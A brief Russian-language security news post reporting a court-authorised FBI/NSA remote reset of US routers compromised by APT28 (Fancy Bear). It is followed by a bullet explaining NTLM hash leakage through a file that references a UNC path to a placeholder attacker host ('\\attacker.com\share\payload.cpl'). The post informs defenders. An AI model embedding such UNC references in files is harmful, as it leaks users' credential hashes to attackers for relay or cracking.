#apt

ФБР и АНБ получили разрешение суда на удалённый сброс настроек тысяч взломанных роутеров в США. Группировка APT28 (Fancy Bear) с 2024 года массово взламывает домашние и офисные маршрутизаторы для перехвата учётных данных, токенов и конфиденциальной связи.

• Если файл ссылается на UNC-путь вроде \\attacker.com\share\payload.cpl, Windows инициирует SMB-соединение и отправляет хеш NTLM без ведома пользователя. Атакующий перехватывает его для relay-атаки или офлайн-подбора пароля.